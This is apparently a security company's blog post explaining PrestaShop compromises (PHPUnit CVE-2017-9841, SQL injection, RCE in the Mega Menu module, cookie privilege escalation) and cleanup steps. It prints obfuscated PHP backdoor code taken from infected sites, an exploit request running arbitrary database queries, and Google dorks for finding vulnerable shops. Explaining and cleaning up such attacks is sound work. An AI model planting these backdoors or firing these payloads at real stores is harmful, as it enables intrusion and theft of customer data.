Table of Contents [TOC]
In the past, PrestaShop has undergone various hack attempts. E-commerce security bears great significance as it is somewhere connected to instant revenue loss. In the past couple of years, the use of e-commerce solution has increased alarmingly owing to which ‘PrestaShop hack’ has increased extensively.
It has become imperative for users to spend more time and money on Prestashop security. In this article, you will know more about why Prestashop sites keep getting hacked again, Vulnerabilities present in prestashop, How to clean up hacked prestashop site & muich more.
Of late, PrestaShop has discovered a malware in 2020 named XsamXadoo Bot. Let us first discuss this malware in detail.
A couple of days back, PrestaShop (an open-source E-commerce solution) shared particulars about a potential threat of a malware known as XsamXadoo on its stores.
Using this malware, the hacker gets easy access to your PrestaShop store. In the past, many store owners of this popular E-commerce solution have, reportedly, already become prey to this malware. This particular malware uses a known vulnerability present in the PHP tool. It was immediately shared under CVE-2017-9841.
Stay tuned to know more details about this malware and how you can confiscate this malware. Besides, we will share the steps you should espouse to check the vulnerability in your stores.
Is your Prestashop Hacked? Get in touch with us and we’d be happy to assist you. Secure your Prestashop now.
Here is a list of known malicious files that may indicate a compromised shop:
To check if Core PrestaShop files have been modified > look at the “List of changed files” section at the bottom of the “Advanced Parameters > Information” page in your Back Office.
As discussed above, we have found the vulnerability in PHP tool – PHP Unit and it is identified as CVE-2017-9841.The vulnerability affects the file in the PHP Unit folder – “Util/PHP/eval-stdin.php”.
If you are one of those who were on PHP Unit versions before 4.8.28 or using versions 5.x before 5.6.3 then you are prone to this vulnerability.
We came across number of foums where people ask questions such as
If you are skeptical about whether or not your store is vulnerable to the attack, you should do the following things to get rid of all your doubts –
You don’t need to worry as checking your store for risk is like shooting a fish in the barrel. Just follow the below-mentioned steps –
Connect via FTP or shell access > look at the “vendor” directory in the main prestashop folder inside each module:
If there’s a directory called “phpunit” inside the aforementioned directories, your shop might be hacked
Warning: don’t touch anything else or you might break your shop Other files and folders (e.g /vendor/symfony/symfony/src/Symfony/Bridge/PhpUnit/ or .xml files) are safe, do not delete them.
Now, at this stage, two cases may arise.
If the folder is there, you are at risk. First and foremost, you need to delete the PHP Unit folder. Rest assured, deleting the PHP Unit folder won’t affect the functioning of your website. This move will end up reducing the risk of your store may be vulnerable to XsamXadoo malware.
Go ahead and repeat the same process from the beginning with all your modules i.e. search, find, delete the PHP Unit folder & save your store from critical security vulnerability in prestashop modules.
Congratulations, you don’t need to worry as you are safe. However, if you want you can still choose to go one step ahead and secure your PrestaShop Store with the best possible security measures.
NOTE: You can also scan your site using a prestashop exploit or prestashop vulnerability scanner online.
Before You Fix hacked Prestashop, You Should Know About Prestashop Hack Symptoms –
Here’s an example:
home/i***/public_html/fractals**.com/css/index.php
<?php /*301f7*/ @include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o"; /*301f7*/ /* * 2007-2017 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2017 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Location: ../"); exit;
You can see a random letter.php file inserted in the same directory, see image below
which contains the following code:
<?php $scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl =
At times, you may notice that the index.php files have like
@include “\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o”;
Notice that at the end of the path there is an .ico file. This is the source of the problem and must be removed.
Possible causes of prestashop exploit are as follows –
In PrestaShop, one of the common vulnerabilities is SQL Injection or malicous code injection. Since it deals with the database, this is what makes it serious. This occurs when you provide un-sanitized input. Then the DBMS tends to execute the query from the input, leading to the divulgence of the key details.
The cause was first reported in 2014.The issue was detected within the parameter id_manufacturer.
http://example.com/ajax/getSimilarManufacturer.php?id_manufacturer=3[SQL-injection]
The following line of code offers unsanitized input following id_manufacturer. Therefore, it is easier for the hacker to read the database, hence compromising the security of the PrestaShop. Additionally, the hacker can further automatically exploit using tools such as Sqlninja, Sqlmap, etc.
Of late, a new PrestaShop SQL injection has been discovered. The E-commerce solution version (1.5.5.0 – 1.7.2.5) was found to suffer from this vulnerability and it was known as CVE-2018-8824. This was caused by the module known as Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro. So, if you have downloaded this module, you need to update it right away.
GET: http://site/modules/bamegamenu/ajax_phpcode.php?code=p(Db::getInstance()-
>ExecuteS("show tables")); With the help of this code, data is fetched using the ajax query from the vulnerable parameter. You will be able to have a look at the tables present in the database.
You will be able to perform the database operation of your choice; you just need to replace the statement – “show tables” with the statement of your choice, it will be much easier to perform database operations. So, it will be easy for the hacker to go through the sensitive tables.
Login details are revealed through these tables, PrestaShop security has been breached and the dashboard can be easily hacked.
This is one of the serious security issues of PrestaShop. This issue occurs when a user having lower privileges is provided higher privileges. This issue for PrestaShop was discovered in 2011 and the latest one was discovered in 2018.
All PrestaShop versions below 1.6.1.19 suffered from this issue. This vulnerability was known as CVE-2018-13784. The key fault behind this issue is the buggy encryption of the user cookie. This E-commerce solution makes use of Blowfish/ECD or AES encryption through openssl_encrypt(). So, this makes it prone to padding oracle attacks.
Besides, the hacker also gets an easy opportunity to both read and write the contents of a PrestaShop cookie. Therefore, the users tend to visit the cookies that are not meant for it, leading to privilege escalation. The hacker can –
The whole process where the cookies are being issued takes place in ./classes/Cookie.php.
Also Read – Privilege Escalation Vulnerability WordPress
Probably, when you run PrestaShop on a WordPress installation, you will come across compatibility issues more often. It has been noticed, that WordPress updates to the latest version automatically. In contrast, this is a practical practice. However, the main area of disagreement lies in a failed update. Therefore, this further becomes clear when the process of WordPress is unsuccessful.
WordPress Failed Update Process –
Step 1 – Try to update.
During the process of update, move and edit the file.
Step 2 – Update Filed.
In a situation where the update has failed, make sure you create a copy of wp-config.php.
Step 3 – Exit
You need to save it as a text file on the server.
Well, the above information looks fine, wait, no actually. A .txt copy of file wp-config.php is created by WordPress. Now, the server has the sensitive details of the PrestaShop database in the form of a txt file. Special scanners are being made to look out for such files. Now, the hacker can go ahead and conduct a PrestaShop hack. This is the outcome of faulty WordPress installation.
The sole source of this hack is buggy coding. As per this hack, the hacker can, remotely, run code on your system and leave your server compromised. A remote code execution vulnerability was discovered in PrestaShop security. It was named CVE-2018-8823 and the vulnerability was found in the Responsive Mega Menu Pro module.
The main cause behind this was an unknown function found in the file modules/bamegamenu/ajax_phpcode.php. The code can be easily run remotely by making changes in the parameters. There is no need to have a formal authentication to exploit it.
There is a possibility that the word ‘admin’ can compromise a company. Most of the time, people tend to overlook default installation. Make sure that no installation should have a default password and the root directory should not be visible on the internet as it may leak installation files.
At times apt checks and balances are not implemented. Therefore, PrestaShop offers the provision of uploading specially crafted files. This is one of the serious issues as it may compromise your website as well.
What’s worse, it can be used to install the malware in your system. Furthermore, there is no dearth of google dorks who will check for the vulnerable files in bulk. For instance –
inurl:”/modules/columnadverts2/”
or
inurl:”/modules/columnadverts/”
You can easily find vulnerable PrestaShop servers by doing a simple Google search of these terms, faulty coding cannot always be blamed. You might have set faulty permissions.
You must have heard about Cross-site scripting XSS. It is one of the common vulnerabilities. On successful exploitation of an XSS attack, you have to go through the following situations –
As per this Black Hat SEO method, the hacker hacks the search engine results of your website. Google or Bing (Google Bots) will crawl your website as if it is in Japanese or Pharma related. You can make yourself familiar about Japanese Keywords Hack or WordPress pharma hack by typing the below-mentioned query in Google –
Site:example.com or Site:example.com japan or Site:example.com Viagra
Pharma Spam –
If your PrestaShop store is hacked, you can follow the below-mentioned cleanup measures –
The first step that you need to adopt is to block access to all the important folders. You can do this by creating a .htaccess file inside the folders. In that file, you can write –
Order Deny,Allow
Deny from all
Allow from 22.33.44.55
The above code denies access to the file/folder. ‘Allow from 22.33.44.55’means that you are permitting access to particular IPs. You also have the provision of adding a range of IPs. You may want to have a look at .htaccess files as well. In the case of the PrestaShop hack, you must clean them first.
You have to ensure that you have given correct permissions for the files. When it comes to files, they are 644(rw-r–r–) and for directories 755 (rwxr-xr-x). They must be correctly as this will prevent misuse of file access.
In the past, there have been instances where vulnerable plugins were responsible for the PrestaShop hack. Make sure you check buggy or outdated modules, you can either update them or get rid of them.
The cleanup process also involves encrypting login values in admin tables. This way you will provide double protection in case your important data gets compromised. Besides, for other applications installed on the same server, you should opt for a separate database.
It is imperative to have strong FTP and login credentials. Avoid using common phrases and words.
Hackers, across the globe, make their best to hide the code. Coding experts do this by using encoding that is not easily readable to the human eyes. So, maybe you want to look out for code hidden in the base64 format. If you choose to look for it manually then it will be a cumbersome task to find it. On the other hand, the following piece of code will do the trick for you –
find . -name “*.php” -exec grep “base64″‘{}’\; -print &> fewfwd.txt
The above-mentioned code will search for base64 code and save it inside fewfwd.txt. After analyzing this, you may want to look out for the below-mentioned redirecting domains –
<li><a href=”frefre-domain.com”>Something1</a></li>
To look out for suspicious domains, you can have a look in the file fewfwd.txt.
Make sure you have taken the backup of all your files and update them at regular intervals. Try to install fresh installation only from the official website.
If you want to avoid the PrestaShop hack, make sure you use a firewall. With the help of a firewall, you will be able to keep unauthorized users at bay. You can choose from a plethora of firewalls available in the market, some of them are free and some are easy on the pocketbook. You also have the option of using a plugin for this purpose.
If you have found the PHP Unit folder in your store, make sure you delete it. But, even after this, how can you be sure that your store was not compromised?
Well, have a look at your store for the following symptoms –
What happens if my store is already infected? As per this vulnerability, the hacker gets easy access to your website, for instance – he can easily steal customer’s details. In case you happen to find your recent files, in your store, with the following names shows that your website is compromised –
The best way is to recover a backup before the date of infection and look for the PHP Unit folder. Otherwise, it will become necessary to –
If you are eyeing to control the damage as soon as possible, you need to act fast.
One of the most efficient and infallible methods is to take expert help. Avoid getting into intricate methods of complex trials of a self-malware cleanup. Relax and follow the below-discussed steps –
Our experts are already aware of this vulnerability and we have already secured numerous websites and E-commerce stores. Our experts will perform a complete checkup of various modules on PrestaShop Add-ons to look for the vulnerable PHP Unit folder.
If you have queries or doubts about the PrestaShop website, reach out to us. We will happy to lend a helping hand in protecting and monitoring your PrestaShop website.
Wrap Up
In a short period, PrestaShop stores have encountered massive malware attacks. Unless you have taken prompt action, you may have to suffer from a hacked PrestaShop store.
For advanced security, make sure you implement the best security measures into your store .